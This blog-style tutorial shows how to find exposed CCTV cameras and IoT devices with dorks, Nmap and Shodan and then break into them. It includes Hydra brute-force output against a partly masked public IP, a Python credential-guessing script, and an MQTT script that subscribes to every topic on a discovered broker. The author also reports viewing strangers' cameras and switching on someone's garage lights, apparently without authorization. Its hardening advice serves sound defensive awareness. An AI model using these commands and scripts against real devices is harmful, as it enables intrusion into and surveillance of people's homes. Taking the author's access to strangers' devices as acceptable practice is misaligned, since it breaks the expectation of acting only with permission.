How to hack CCTV cameras and IoT devices


5G has arrived, and more and more devices are being connected to the internet, which also exposes them to malicious users. CCTV cameras remain the most targeted class of device so far, but attackers are increasingly turning to home IoT devices.

This article shows how attackers are able to spy on people's everyday lives and remotely operate thermostats, lights and garage doors. It then explains ways to protect against such attacks. Finally, a video is shared showing how 20 IoT devices were hacked.

Disclaimer

Accessing IoT devices without permission is illegal. Do not try any of the described methods without authorization. This article is for educational purposes only, and Forknerds is not responsible for any misuse. The aim of the article is to raise awareness of IoT and CCTV camera security.

Hackers’ IoT Targets

The most common devices targeted by hackers are the following:

  • Wireless cameras (CCTV)
  • Wireless printers
  • Wireless NAS and routers
  • Baby monitors
  • Smart home assistants
  • Smart thermostats
  • Smart door locks
  • Doorbell cameras
  • Smart light switches
  • Smart smoke alarms
  • Sensors
  • Fitness devices
  • Health devices

What exactly is IoT (Internet of Things)?

According to Wikipedia, the Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

In simple terms, IoT means everyday devices connected to the internet. Size is irrelevant: it can be a smartwatch or an expensive super-car.

However, there are serious concerns about the risks of such widespread adoption of IoT.

How to find CCTV cameras and IoT Devices

Detecting devices with Google dorks

Search engines use thousands of crawler bots to continuously discover, crawl and index web content. During this process, the crawlers may encounter and index web servers that belong to IoT devices or CCTV cameras. Specially crafted Google dorks (search queries that match the distinctive pages of such devices) reveal them.

The easiest way to find IoT Google dorks is the Google Hacking Database, where there is a category called "Various Online Devices". I have collected some of the most interesting Google dorks per device:

[Screenshot: 374 online cameras discovered by Google]
[Screenshot: example online thermostat panel]
[Screenshot: example D-Link router]

IoT & CCTV Network Scanners

Almost all IoT devices run services on the TCP/IP stack that network scanners can detect. Nmap is open-source software used to discover and audit network hosts.

Nmap has countless features that help detect open ports, which services are running and the operating system in use. It can also tell whether a target sits behind a firewall.

Each IoT device or CCTV camera listens on a different port and runs a different daemon, so it is not an easy task to write a single Nmap command that enumerates every kind of device.

My proposed fast Nmap command to enumerate the vast majority of IoT devices and CCTV cameras is the following:

nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 80,8080,8081,8082,8083,9550 <target>

Explanation of the flags:
-T5 : timing template (higher is faster; T5 is the most aggressive and may miss slow embedded devices)
--max-parallelism 10 : cap the number of probes in flight at once
-P0 (now spelled -Pn) : skip host discovery and treat every address as up, since many devices drop ICMP echo requests
--max-rtt-timeout 1s : give up on a probe that gets no answer within one second
--open : only show open (or possibly open) ports
-sV : probe open ports to determine service/version info
-p 80,8080,8081,8082,8083,9550 : the most common ports of IoT web interfaces

Two caveats: only scan networks you are authorized to scan, and be aware that fragile embedded devices can hang or reboot under aggressive scans, so drop to -T4 if targets stop responding.

The results are really interesting: even by scanning a small subnet, we were able to detect media servers, DSL routers and webcams.

PORT   STATE SERVICE VERSION
80/tcp open  http    Hikvision DVR web UI
Service Info: Device: media device

PORT   STATE SERVICE VERSION
80/tcp open  http    TP-LINK embedded httpd

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx

PORT     STATE SERVICE VERSION
8080/tcp open  http    Hikvision Network Video Recorder http admin
Service Info: Device: webcam

PORT   STATE SERVICE VERSION
80/tcp open  http
1 service unrecognized despite returning data.

We identified all of the unrecognized services manually; each one led to yet another webcam login page.
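To turn such scan results into an inventory instead of reading them by eye, here is an added example (my code, not from the original article) that parses Nmap's XML output (`nmap -oX`) and applies a few keyword fingerprints to the detected product string. The sample XML and the vendor keyword table are constructed for illustration and mirror the results shown above; every open port for which Nmap could not name a product is queued for the manual review described above.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output, modelled on the scan results above.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" product="Hikvision DVR web UI" devicetype="media device"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" product="TP-LINK embedded httpd"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.0.2.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="8080"><state state="open"/>
        <service name="http" product="Hikvision Network Video Recorder http admin" devicetype="webcam"/>
      </port>
      <port protocol="tcp" portid="8081"><state state="filtered"/><service name="http"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.0.2.13" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" method="table" conf="3"/>
    </port></ports></host>
</nmaprun>
"""

# Hypothetical keyword rules: substrings of Nmap product strings that identify
# common IoT vendors. Extend with what your own scans turn up.
FINGERPRINTS = [
    ("hikvision", "camera/NVR"),
    ("dahua", "camera/NVR"),
    ("tp-link", "router"),
    ("mikrotik", "router"),
    ("synology", "NAS"),
]


def classify(product, devicetype):
    """Map an Nmap product string (and its devicetype hint) to a coarse device class."""
    lowered = (product or "").lower()
    for keyword, label in FINGERPRINTS:
        if keyword in lowered:
            return label
    if devicetype:          # fall back to Nmap's own devicetype field
        return devicetype
    return "unknown"


def parse_nmap_xml(xml_text):
    """Return one record per open port: host, port, product, class, manual-check flag."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue    # --open semantics: ignore closed/filtered ports
            svc = port.find("service")
            product = svc.get("product") if svc is not None else None
            devicetype = svc.get("devicetype") if svc is not None else None
            findings.append({
                "host": addr,
                "port": int(port.get("portid")),
                "product": product,
                "type": classify(product, devicetype),
                # Nmap answered but could not name the service: inspect by hand
                "needs_manual_check": product is None,
            })
    return findings


def manual_review_queue(findings):
    """(host, port) pairs that need a human to open the page and identify the device."""
    return [(f["host"], f["port"]) for f in findings if f["needs_manual_check"]]


if __name__ == "__main__":
    results = parse_nmap_xml(SAMPLE_NMAP_XML)
    for f in results:
        print(f"{f['host']}:{f['port']:<5} {f['type']:<12} {f['product'] or '(unrecognized)'}")
    print("manual review:", manual_review_queue(results))
```

Feed it a real file with `parse_nmap_xml(open("scan.xml").read())` after running the command above with `-oX scan.xml`.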

Computers Search Engines

The easiest way to find IoT devices and CCTV cameras is via specialized search engines such as Shodan, ZoomEye and Censys.

These search engines let the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. They have also been described as search engines for service banners, the metadata that a server sends back to the client.

Shodan is a very powerful tool that should be used with extreme caution. A single query can return thousands of camera IPs:

[Screenshot: Shodan has indexed thousands of cameras]

Computer search engines index pretty much everything:

  • Cams
  • Water treatment facilities
  • Yachts
  • Medical Devices
  • Traffic lights
  • Wind turbines
  • Satellites
  • Smart TVs
  • Media Servers
  • Refrigerators
  • Everything with a public IP

All these engines have online APIs that can be used to automate and speed up enumeration. They support filters that target specific ports, operating systems, protocols or banner strings.

Exploitation

In general, IoT exploitation can be divided into two broad categories: remote and physical. This article presents remote exploitation methods. If you are interested in local (physical) exploitation, check the video at the end of the article.

Zero Exploitation Effort

Countless IoT devices and webcams are misconfigured so that no credentials are required to reach their control panel. As soon as you find the device's IP, you are already in.

[Screenshot: IP camera without credentials]

Even unprotected puppy cams turn up:

[Screenshot: unprotected puppy cams]

Brute Force administrator panel

Many discovered IoT devices have a password-protected administration panel, like the following thermostat:

[Screenshot: NT130h thermostat login panel]

Hydra is a parallelized login cracker that supports numerous protocols. It is very fast and flexible, and is considered a "classic" hacking tool, having existed for over a decade. It can brute-force an IoT device's panel easily, as shown below:

root@kali ~# hydra -t 10 -I -C passwords.txt 73.110.xx.xx -s 84 http-get "/index.shtml"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-30 19:53:32
[DATA] max 10 tasks per 1 server, overall 10 tasks, 49 login tries, ~5 tries per task
[DATA] attacking http-get://73.110.xx.xx:84//index.shtml
[84][http-get] host: 73.110.xx.xx   login: admin   password: xxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-30 19:54:21

Explanation
-t TASKS run TASKS number of connects in parallel per target
-C FILE colon-separated “login:pass” format, instead of -L/-P options
-I ignore an existing restore file (don’t wait 10 seconds)
http-get attack method for basic HTTP authentication
-s PORT if the service is on a different default port, define it here
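Under the hood, Hydra's http-get module sends one HTTP GET per credential with an `Authorization: Basic` header and treats anything other than a 401 as a hit. The added example below (my code, not from the article or the Hydra project) reproduces that exchange end to end against an in-process mock panel so it can be run offline: the mock panel, its single valid credential `admin:1234`, the realm name and the `login:pass` list are all constructed for the demonstration. As with Hydra itself, point it only at devices you are authorized to test.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed mock "admin panel": the only credential it accepts (hypothetical).
MOCK_USER, MOCK_PASS = "admin", "1234"


class MockPanel(BaseHTTPRequestHandler):
    """Minimal stand-in for a device web UI protected by HTTP Basic authentication."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{MOCK_USER}:{MOCK_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"panel")
        else:
            # What a real panel sends: 401 plus the realm, which is what hydra attacks
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="thermostat"')
            self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_mock_panel():
    """Bind the mock panel to an ephemeral localhost port and serve it in the background."""
    server = HTTPServer(("127.0.0.1", 0), MockPanel)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_basic_auth(host, port, path, user, password, timeout=5):
    """One GET with a Basic credential; True iff the server does not answer 401."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        resp = conn.getresponse()
        resp.read()
        return resp.status != 401
    finally:
        conn.close()


def check_credential_list(host, port, path, pairs):
    """Equivalent of `hydra -C`: walk login:pass pairs, return the first accepted one."""
    for line in pairs:
        if ":" not in line:
            continue                     # skip malformed entries
        user, password = line.split(":", 1)
        if try_basic_auth(host, port, path, user, password):
            return user, password
    return None


# Constructed list in hydra's -C "login:pass" format
DEFAULT_PAIRS = ["admin:admin", "admin:password", "root:root", "admin:1234", "user:user"]

if __name__ == "__main__":
    srv = start_mock_panel()
    port = srv.server_address[1]
    print("found:", check_credential_list("127.0.0.1", port, "/index.shtml", DEFAULT_PAIRS))
    srv.shutdown()
```

Note what makes this trivial for an attacker: the panel answers every wrong guess instantly and never locks the account. A device that rate-limits or locks out after a handful of failures turns a 49-guess list that Hydra finishes in under a minute into something impractical.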

Always use Complex Passwords!

Hacking IoT with MQTT

According to Wikipedia, MQTT is an open OASIS and ISO standard lightweight, publish-subscribe network protocol that transports messages between devices. It is designed for connections with remote locations where a “small code footprint” is required or the network bandwidth is limited.

[Diagram: MQTT architecture]

The MQTT architecture consists of clients and brokers. The broker is the node that receives all messages from the clients and routes them to the clients subscribed to the matching topics. Clients that send information to the broker are called publishers; the broker is responsible for forwarding their data to the subscribers.

As already mentioned, it is easy to locate MQTT brokers in the wild via network scanners like Nmap (1883 is the plaintext port; 8883 is MQTT over TLS):

$ nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 1883,8883 <ip>

As soon as you locate a passwordless broker, you can connect and subscribe to all topics using an MQTT client. A client can even be a short Python script using the paho-mqtt library. Note that the "#" wildcard does not match topics beginning with "$" (such as the broker's own $SYS/ statistics), so a client that wants everything has to subscribe to both "#" and "$SYS/#".

import paho.mqtt.client as mqtt

BROKER_IP = "<Broker IP>"   # replace with the discovered broker

def on_connect(client, userdata, flags, rc):
    print("Connected with result code " + str(rc))
    # "#" matches every application topic; "$SYS/#" must be subscribed separately,
    # because wildcards never match topics that start with "$"
    client.subscribe("#")
    client.subscribe("$SYS/#")

def on_message(client, userdata, msg):
    # payload is bytes; decode for display without crashing on binary data
    print(msg.topic + " " + msg.payload.decode("utf-8", errors="replace"))

try:
    # paho-mqtt 2.x requires choosing a callback API version; VERSION1 keeps the signatures above
    client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
except AttributeError:
    client = mqtt.Client()  # paho-mqtt 1.x
client.on_connect = on_connect
client.on_message = on_message
client.connect(BROKER_IP, 1883, 60)   # 60-second keepalive
client.loop_forever()

In my case, I will use my favourite MQTT client, MQTT Explorer, to connect to one of the discovered brokers. The client automatically subscribes to all available topics. MQTT topics are a form of addressing that lets MQTT clients share information, and they form a hierarchy as shown below.

[Screenshot: MQTT Explorer]

The leaves of each topic hold the data produced by sensors and devices, such as humidity, motion and battery level. A passwordless broker is already a serious exposure, but it gets worse: MQTT messages are also how devices receive commands, so anyone who can publish can change a device's state. For example, we are able to switch on the garage lights remotely by publishing the relevant message. The options are countless.

[Screenshot: remotely switching on the garage lights]

Attackers can easily control every IoT device behind an unprotected MQTT broker.
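Whether a broker is passwordless can be established without any library at all: an MQTT 3.1.1 CONNECT packet carrying no username or password, answered by a CONNACK with return code 0, means anonymous access is allowed, while code 5 ("not authorized") or 4 ("bad user name or password") means the broker requires credentials. The added example below (my code, not from the article or any MQTT project) builds the CONNECT packet and parses the CONNACK by hand, which also shows how little the protocol itself asks of a client. `probe_anonymous_access` is the only function that opens a network connection; the client identifier `iot-audit` is an arbitrary choice, and the encoder and decoder can be checked offline against the spec's own byte layout.

```python
import socket

# MQTT 3.1.1 CONNACK return codes (spec section 3.2.2.3)
CONNACK_CODES = {
    0: "connection accepted",
    1: "unacceptable protocol version",
    2: "identifier rejected",
    3: "server unavailable",
    4: "bad user name or password",
    5: "not authorized",
}


def encode_remaining_length(n):
    """MQTT variable-length integer: 7 bits per byte, high bit set while more bytes follow."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        if n > 0:
            byte |= 0x80
        out.append(byte)
        if n == 0:
            return bytes(out)


def _utf8_field(s):
    """Length-prefixed UTF-8 string as used in MQTT variable headers and payloads."""
    data = s.encode("utf-8")
    return len(data).to_bytes(2, "big") + data


def build_connect(client_id, username=None, password=None, keepalive=60):
    """Build an MQTT 3.1.1 CONNECT packet; with no username/password it is an anonymous connect."""
    flags = 0x02                                   # clean session
    payload = _utf8_field(client_id)
    if username is not None:
        flags |= 0x80                              # user name flag
        payload += _utf8_field(username)
    if password is not None:
        flags |= 0x40                              # password flag
        payload += _utf8_field(password)
    variable_header = (
        _utf8_field("MQTT")                        # protocol name
        + b"\x04"                                  # protocol level 4 = MQTT 3.1.1
        + bytes([flags])
        + keepalive.to_bytes(2, "big")
    )
    body = variable_header + payload
    return b"\x10" + encode_remaining_length(len(body)) + body   # 0x10 = CONNECT


def parse_connack(data):
    """Return (session_present, return_code) from a CONNACK packet, or raise ValueError."""
    if len(data) < 4 or data[0] != 0x20 or data[1] != 0x02:   # 0x20 = CONNACK, length 2
        raise ValueError("not a CONNACK packet")
    return bool(data[2] & 0x01), data[3]


def probe_anonymous_access(host, port=1883, timeout=5):
    """Send an anonymous CONNECT and report the broker's verdict.
    Only probe brokers you are authorized to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect("iot-audit"))   # client id is an arbitrary assumption
        _, code = parse_connack(sock.recv(4))
    return code == 0, CONNACK_CODES.get(code, f"unknown code {code}")


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    open_broker, verdict = probe_anonymous_access(host)
    print(f"{host}: anonymous access {'ALLOWED' if open_broker else 'denied'} ({verdict})")
```

A broker answering code 0 here is exactly the "passwordless broker" the article describes; a properly configured one answers 5 (or 4) and then closes the connection.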

Video: How to hack 20 devices in 45 minutes

How to protect your IoT devices

There is no silver bullet when it comes to IoT protection. The following list summarizes the most important ways to protect your IoT devices.

  • Buy IoT brands that focus on security and release updates regularly
  • Keep your IoT device firmware and software up to date
  • Enable authentication on all administrator panels
  • Enable TLS encryption for MQTT connections (port 8883) and require client credentials on the broker
  • Enable two-factor authentication if your device supports it
  • Always use long, complex passwords, unique per device
  • Do not use the application's default ports (this reduces noise from automated scans, but does not hide the service from engines like Shodan, which scan many ports)
  • Do not use default usernames and passwords
  • Disable features that you do not need
  • Do not expose internal servers to the internet
  • Put remote management behind a VPN instead of a public port
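As an added, hypothetical illustration of three of the points above (authentication, MQTT encryption, and not leaving the plaintext port exposed), here is a weak Mosquitto broker configuration beside its hardened form. This is my example, not configuration from the article; the file paths are assumptions.

```conf
# --- WEAK (the kind of broker the article finds): anonymous, plaintext on 1883 ---
listener 1883
allow_anonymous true

# --- HARDENED: credentials required, TLS only, plaintext listener removed ---
listener 8883
allow_anonymous false
password_file /etc/mosquitto/passwd
cafile   /etc/mosquitto/certs/ca.crt
certfile /etc/mosquitto/certs/broker.crt
keyfile  /etc/mosquitto/certs/broker.key
# Optional: mutual TLS, with the client certificate's CN used as the username
require_certificate true
use_identity_as_username true
```

Create the password file with `mosquitto_passwd -c /etc/mosquitto/passwd <username>` (it prompts for the password and stores a hash). Mosquitto 2.0 and later already default to `allow_anonymous false` and refuse to start a listener without authentication, but an explicit `allow_anonymous true` copied from an old tutorial reopens the broker to exactly the attack shown above.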

Conclusion

Security is a big challenge for IoT and CCTV cameras. Cyber attacks will increase, and they may focus on ever smaller devices. Personal privacy is at risk, as attackers can reach you inside your own house. Security professionals must understand the challenges of new technology. As time passes and new technologies emerge, new attack vectors will be found and exploited by hackers.
